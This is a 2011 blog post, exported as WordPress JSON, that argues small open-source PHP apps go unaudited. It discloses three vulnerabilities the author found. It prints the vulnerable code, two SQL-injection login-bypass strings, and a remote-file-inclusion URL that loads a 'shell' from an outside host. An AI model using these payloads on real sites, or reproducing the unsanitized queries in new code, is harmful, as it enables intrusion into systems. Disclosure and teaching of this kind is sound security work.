{"id":121,"date":"2011-07-04T15:00:46","date_gmt":"2011-07-04T20:00:46","guid":{"rendered":"http:\/\/trillworks.com\/nick\/?p=121"},"modified":"2013-02-10T00:38:09","modified_gmt":"2013-02-10T06:38:09","slug":"finding-0-day-vulnerabilities-in-the-ghetto","status":"publish","type":"post","link":"https:\/\/trillworks.com\/nick\/2011\/07\/04\/finding-0-day-vulnerabilities-in-the-ghetto\/","title":{"rendered":"Finding 0-day Vulnerabilities in the Ghetto"},"content":{"rendered":"

The woeful security practices of many open source PHP applications constitute a hallmark of the so-called ghetto<\/a>. I know because I’ve introduced a handful of\u00a0embarrassing\u00a0security holes<\/a> in past open source contributions. These simple mistakes are symptoms highlightling the conditions conducive to large amounts of unknown vulnerabilities.<\/p>\n

I conjecture that small PHP applications are the easiest target. Here’s why:<\/p>\n

1. Low barrier to entry<\/strong>
\nWhen people encourage budding programmers to cut their teeth by working on open source projects, many of them flock to PHP because it’s easy to build useful applications quickly. This is not necessarily bad. I had a blast learning PHP and it definitely contributed to my general interest in software. Just remember that the last web app you downloaded from sourceforge was likely written by a 16 year old with a copy of PHP in 24 hours<\/em>. Kenny Katzgrau crystallizes this point in a discussion of PHP’s past shortcomings<\/a>:<\/p>\n

In it\u2019s pizza-faced adolescent years (pre-5.0), PHP gained a serious following among novices. The language has a fantastically low barrier to entry, so anyone could get started in 2 minutes by downloading some self-extracting *AMP stack for Windows. […]\u00a0What do you get when you mix n00bs and a lack of best practices? Unmaintainable garbage. And that\u2019s what proliferated.<\/p><\/blockquote>\n

2. Lack of oversight<\/strong><\/p>\n

Given enough eyeballs, all\u00a0bugs are shallow.
\n–Linus’ Law<\/p><\/blockquote>\n

The small number of people contributing to little PHP projects fails to satisfy the “eyeballs” supposition in this popular open source trope. There simply aren’t enough people looking at small projects to find even the simplest security problems. Given that general bugs are inevitable, the inexperienced nature of many developers compounds the likelihood that serious security flaws will arise and go undetected.<\/p>\n

Consider a small two person project. Neither person really cares enough to personally audit the code. Maybe it’s on someone’s to-do list, but not before adding fun new features or doing laundry. So where does the buck stop? Certainly not with the user. An individual might contribute a bug fix if it causes a visible problem in the software system, but even that’s optimistic. Remember, this is a small project in the realm of 10k lifetime downloads. So the job will likely get picked up by two groups: altruistic security folk who disclose vulnerabilities responsibly and… hacker <\/em>hackers.<\/p>\n

\"hackers\"<\/a>
“The passwords are stored as plaintext!”<\/figcaption><\/figure>\n

Realistically, the white hat security researchers are far less likely to find these holes than their nefarious counterparts. They tend to focus their efforts on larger projects. It’s far more glamorous to find a bug in a big project, say\u00a0WordPress, or the Linux kernel. To be fair, black hats have a financial incentive to find bugs in large projects, but given the extreme low quality of code in smaller projects, it’s probably a better time trade off to target the little ones.<\/p>\n

So these conditions leave the open source community with an abundance of poorly written projects that are only seriously audited by blackhats. Perfect storm much?<\/p>\n

Below I highlight vulnerabilities in three small open source applications. When this post was written all\u00a0vulnerabilities were unknown. The authors were contacted a few weeks ago and said they would fix the problems ASAP.\u00a0Let’s stroll through the ghetto.<\/p>\n

Movie recommendation website<\/a><\/h2>\n

Vulnerability type: SQL Injection
\nVulnerable pages: login.php, userSearch.php
\nThe login page only asks for a username. Let’s call it half-factor authentication.<\/p>\n

$name=$_POST['username'];\r\n$query = \"SELECT * FROM users WHERE username= \\\"$name\\\"\";\r\n$counter=0;\r\n\tforeach ($db->query($query) as $row)\r\n\t{\r\n\t$name=$row['username'];\r\n\t$userid=$row['userid'];\r\n\t$counter+=1;\r\n\t}\t\r\n\r\n\tif ($counter==1){\r\n\t\t$_SESSION['userid']=$userid;\r\n\t\t$_SESSION['username'] =$name;\r\n\t\tprint \"Session registered for $name\";\r\n\t}\r\n\telseif ($counter==0){\r\n\t\tprint \"No username found for $name.\";\r\n\t}\r\n\r\n\telseif ($counter>1){\r\n\t\tprint \"That's weird, more than one account was found.\";\r\n\t}<\/pre>\n
If we know someone’s username, we’re already golden. Otherwise, we need to get the SQL query to return exactly one row. That’s easy enough with the following username parameter:
\n\" OR \"1\"=\"1\" LIMIT 1 ;<\/code><\/p>\n
Gisbee CMS<\/a><\/h2>\n
Vulnerability type: SQL injection
\nVulnerable files: beeback 1.0.0\/includes\/connect.php
\nThis new CMS doesn’t sanitize inputs from the main login form on its home page.<\/p>\n
if (isset($_POST['login'])){\r\n\t$login = $_POST['login'];\r\n\t$pass = md5($_POST['pass']);\r\n\t$verif_query = sprintf(\"SELECT * FROM user WHERE email='$login' AND password='$pass'\");\r\n\t$verif = mysql_query($verif_query, $db) or die(mysql_error());\r\n\t$row_verif = mysql_fetch_assoc($verif);\r\n\t$user = mysql_num_rows($verif);\r\n\r\n\tif ($user) {\r\n\t\tsession_register(\"authentification\");\r\n\t\t$_SESSION['role'] = $row_verif['usertype'];\r\n\t\t$_SESSION['lastname'] = $row_verif['lastname'];\r\n\t\t$_SESSION['firstname'] = $row_verif['firstname'];\r\n\t\t$_SESSION['email'] = $row_verif['email'];\r\n\t}else{\r\n\t\t$_GET['signstep'] = \"failed\";\r\n\t}\r\n}<\/pre>\n
If magic quotes are off, we can login with the following username:
\n1' OR '1'='1'#<\/code><\/p>\n
reciphp:\u00a0An open source recipe cms script.<\/a><\/h2>\n
Vulnerability type: Remote file inclusion
\nVulnerable files: index.php<\/p>\n
if (!isset($_REQUEST['content']))\r\n                   include(\"main.inc.php\");\r\n               else\r\n               {\r\n                   $content = $_REQUEST['content'];\r\n                   $nextpage = $content . \".inc.php\";\r\n                   include($nextpage);\r\n               }<\/pre>\n
If the server’s allow_url_include() option is set, then we can include malicious remote code by crafting the url:
\nhttp:\/\/[path].com\/index.php?content=http:\/\/path.com\/shell<\/span><\/p>\n
To be fair to the PHP community, the ghetto has shrunk. But there is a vast divide between the gentrified segment, people who read programming blogs and know why frameworks are good (or bad), and everyone else. I don’t believe there is a complete technical solution, although conservative default settings in php.ini certainly help stave off a fair amount of attacks. The onus is on the community to bring the less fortunate up to speed. If you know a blossoming PHP programmer, take five minutes to explain SQL injection and remote file inclusion. You’ll save someone a lot of trouble.<\/p>\n","protected":false},"excerpt":{"rendered":"
The woeful security practices of many open source PHP applications constitute a hallmark of the so-called ghetto. I know because I’ve introduced a handful of\u00a0embarrassing\u00a0security holes in past open source contributions. These simple mistakes are symptoms highlightling the conditions conducive to large amounts of unknown vulnerabilities. I conjecture that small PHP applications are the easiest … <\/p>\n
Continue reading “Finding 0-day Vulnerabilities in the Ghetto”<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[77],"tags":[16,15,19,14,18,17],"class_list":["post-121","post","type-post","status-publish","format-standard","hentry","category-technical","tag-0-day","tag-ghetto","tag-open-source","tag-php","tag-security","tag-vulnerability"],"_links":{"self":[{"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/posts\/121","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/comments?post=121"}],"version-history":[{"count":17,"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/posts\/121\/revisions"}],"predecessor-version":[{"id":162,"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/posts\/121\/revisions\/162"}],"wp:attachment":[{"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/media?parent=121"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/categories?post=121"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/trillworks.com\/nick\/wp-json\/wp\/v2\/tags?post=121"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}